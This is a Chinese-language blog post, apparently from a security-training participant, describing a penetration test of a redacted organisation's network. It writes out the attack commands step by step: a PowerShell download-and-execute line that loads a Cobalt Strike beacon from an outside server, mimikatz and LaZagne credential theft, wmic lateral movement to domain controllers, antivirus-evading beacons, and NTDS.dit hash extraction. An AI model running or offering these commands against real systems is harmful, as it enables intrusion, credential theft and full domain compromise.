记录某次实战渗透测试过程
作者:admin | 时间:2022-1-16 21:43:31 | 分类:黑客技术 隐藏侧边栏展开侧边栏
本文来自宽字节安全第一期线下培训学员Lemon投稿。
在某次项目中对某个网站的渗透测试,记录一下。
data:image/s3,"s3://crabby-images/0079d/0079d043a8c0aac0d9cd63b28bca1669fa1bf20e" alt=""
先做信息收集,使用oneforall收集一下子域名。
python3 oneforall.py --target xxxxx run
data:image/s3,"s3://crabby-images/19ddd/19ddd49d849eb8ba87d4d922bf2a193e93ef6274" alt=""
在对上面的扫描结果逐一测试的时候,发现某子域名有weblogic漏洞
data:image/s3,"s3://crabby-images/a71d1/a71d1e622ae8098ea008974862ca62df7f8acbf9" alt=""
通过weblogic漏洞利用工具扫描发现有CVE_2020_2551漏洞,管理员用户
data:image/s3,"s3://crabby-images/0f909/0f909cffb19780ab903572dcbdc543125d973828" alt=""
判断是否出网
目标机器出网,并且能和VPS服务器通信
data:image/s3,"s3://crabby-images/2200b/2200bcae2853e9ede5b2dfae329823036489e7ed" alt=""
data:image/s3,"s3://crabby-images/eb45a/eb45a396deb392a27be48923ad5b20aadf9007df" alt=""
cs上线
执行poweshell看能不能上线
cmd.exe /c powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxx'))"
cs可以上线
拿到administrator权限,
data:image/s3,"s3://crabby-images/03a57/03a57be7882f742bac215ab7888f25e2dd877770" alt=""
密码收集
1.执行mimikatz获取密码
logonpasswords
data:image/s3,"s3://crabby-images/9c9a0/9c9a0c13f7105ca30ed22aa4547b50b92272c49c" alt=""
2.使用LaZagne取各种连接工具密码、浏览器保存密码等
shell cmd.exe /c D:bealazagne.exe all -oN
data:image/s3,"s3://crabby-images/7eaf1/7eaf1ef6734234b031c47fb0ae4922b99a9761e3" alt=""
3.抓取浏览器密码,使用BrowserGhost
data:image/s3,"s3://crabby-images/ba0d3/ba0d3f5d746573e45f429882accf6b7064525a1b" alt=""
dump LDAP
查询到目标机器在域内,域用户登录
shell wmic computersystem get domain
data:image/s3,"s3://crabby-images/55921/55921626c77b362e722c321a68a8be3f5aa42d6d" alt=""
shell whoami /all
data:image/s3,"s3://crabby-images/7da24/7da240113ae17ad0ac6751214955b28b44cea165" alt=""
前面已经确定目标机器在域内,并且目标机器是域用户登录。
域成员用户可以通过LDAP访问域的目录数据库从而看到整个域的信息。
这是使用的一种方式是通过 ADExplorer软件dump
将ADExplorer.exe上传到目标机器,使用以下命令执行
D:beaxxADExplorer.exe -snapshot "" D:beaxxresult.dat /accepteula
data:image/s3,"s3://crabby-images/0f40c/0f40cd73145e65b893b71a7506b6647583473a98" alt=""
将resul.dat 在本地用ADExplorer打开即可看到域的信息
data:image/s3,"s3://crabby-images/7741d/7741d2f518c2c1e4c4834379030f191d5138387e" alt=""
扫描内网
查看本机IP,本机IP为192.168.10.3.
使用fscan工具扫描一下192.168.10内网段,从扫描结果看出192.168.10.10和192.168.10.32应该是域控服务器
data:image/s3,"s3://crabby-images/1d91e/1d91e674a47cbabe03ce147b7331185677e04b53" alt=""
data:image/s3,"s3://crabby-images/a16ad/a16ad550c73695e915392bbbc7c7bafb4e3d1893" alt=""
横向
通过LDAP和内网扫描看到域内有两台域控:192.168.10.10、192.168.10.32
判断用户权限
shell whoami /all
data:image/s3,"s3://crabby-images/f0f45/f0f452594b28143eaf6b4b439c902e1ce3875550" alt=""
data:image/s3,"s3://crabby-images/808d8/808d8668750b7bd61a967a017e36bdd3f4bd3a24" alt=""
shell net group "domain admins" /domain
data:image/s3,"s3://crabby-images/5136c/5136cbd54aab624aa23fb76bb66820307df4af83" alt=""
比较幸运,上线就是域管用户可以直接使用域管用户身份横线域内其他机器
先尝试横向域控192.168.10.10机器,wmic可用,通过wmic进行横向
shell wmic /node:192.168.10.10 os get name
data:image/s3,"s3://crabby-images/48a26/48a26e098e3428cb39a63d723dd8e036b0554c8c" alt=""
判断是否有杀软
shell wmic /node:192.168.10.10 process get processid,name
data:image/s3,"s3://crabby-images/3a1aa/3a1aa6813a26b791cb0a64e10f3b7166b0bff110" alt=""
data:image/s3,"s3://crabby-images/d771b/d771bedd06013eba4e3d2727054b9cbd3b5b9ca7" alt=""
列出192.168.10.10进程,使用杀软在线查询,目标机器有杀软
判断192.168.10.10是否出网,如果直接执行ping 8.8.8.8或者其他公网地址,但是CS上没有回显就无法判断,在这里分享一下我常用的两种方法:
1.通过DNSlog (http://www.dnslog.cn/)
shell wmic /node:192.168.10.10 process call create "cmd.exe /c ping g2azxa.dnslog.cn"
data:image/s3,"s3://crabby-images/87b39/87b39a3a8291157bb0bd433afa2e8f548849622c" alt=""
2.通过tcpdump
tcpdump -i 网卡名 icmp
shell wmic /node:192.168.10.10 process call create "cmd.exe /c ping VPSip"
data:image/s3,"s3://crabby-images/36f04/36f042e99cab317c8ebd7740f40ab0bddaf8558e" alt=""
两种方法都没有回显,192.168.10.10不出网。
192.168.10.10不出网而且有杀软,先做免杀,然后通过CS的smb隧道将192.168.10.10link上线
在CS上创建SMB监听,使用smb监听生成beacon。
将做好免杀的beacon 上传到192.168.10.10。
data:image/s3,"s3://crabby-images/2f407/2f407125a95cf125a1f17d2c57693d00bdca8734" alt=""
data:image/s3,"s3://crabby-images/a4b5f/a4b5fcbe20cff7d3b091296604be805b3c5a3e09" alt=""
data:image/s3,"s3://crabby-images/9739c/9739c9d5e9b003df4e013cc6086b04a68ee78947" alt=""
通过link192.168.10.10 上线
shell wmic /node:192.168.10.10 process call create "cmd.exe /c c:UsersPublicms.exe c:UsersPublicmnb.bin.new" link 192.168.10.10
data:image/s3,"s3://crabby-images/d78bb/d78bb4550cb21ebe26ecd7d7d27264f453eb7461" alt=""
data:image/s3,"s3://crabby-images/b408c/b408cf9442c28748da1e81b3612af8dcdd2eaeb9" alt=""
第一台域控上线,接着横向另一台192.168.10.32机器,方法跟上面一样,判断出网和杀软。
data:image/s3,"s3://crabby-images/96d39/96d39e5556694c53fdea9b17c48128a129d0fcee" alt=""
data:image/s3,"s3://crabby-images/48d81/48d811cccee60b85570122ef1ae2675aca92b657" alt=""
192.168.10.32出网有杀软,这样就不用通过link上线了,直接做免杀beacon上线就行。
shell wmic /node:192.168.10.32 process call create "cmd.exe /c c:UsersPublicms.exe c:UsersPublicbeacon.bin.new"
data:image/s3,"s3://crabby-images/5ddd7/5ddd7638303f9ea562c211dea9944d881041ffb9" alt=""
拿到域控可以导出域hash
Windows的密码是经过hash后存储的,本地存在hklmsam,hklmsystem注册表中
域里面存在域控制器的c:windowsntdsntds.dit中,我们取出来解密即可
shell ntdsutil "activate instance ntds" ifm "create full C:usersPublicntdsutil" quit quit
data:image/s3,"s3://crabby-images/39430/3943027f4e736dcac5110f3b090999f25ee18fa8" alt=""
再使用reg命令导出system 和security
reg save hklmsystem system
reg save hklmsecurity security
data:image/s3,"s3://crabby-images/437c9/437c9b0823441d73f75ac3a884bd7e70d94e18fd" alt=""
使用impacket下的secretsdump.py 解hash
python secretsdump.py -ntds "C:ntdsntds.dit" -security "C:ntdsSECURITY" -system "C:ntdsSYSTEM" local
最后成功获取当前域控中所有域账户和密码
data:image/s3,"s3://crabby-images/35b4b/35b4b42172451397e329dd8ca4b72ffc1071512a" alt=""
本文作者:宽字节安全
本文为安全脉搏专栏作者发布,转自:https://www.secpulse.com/archives/171523.html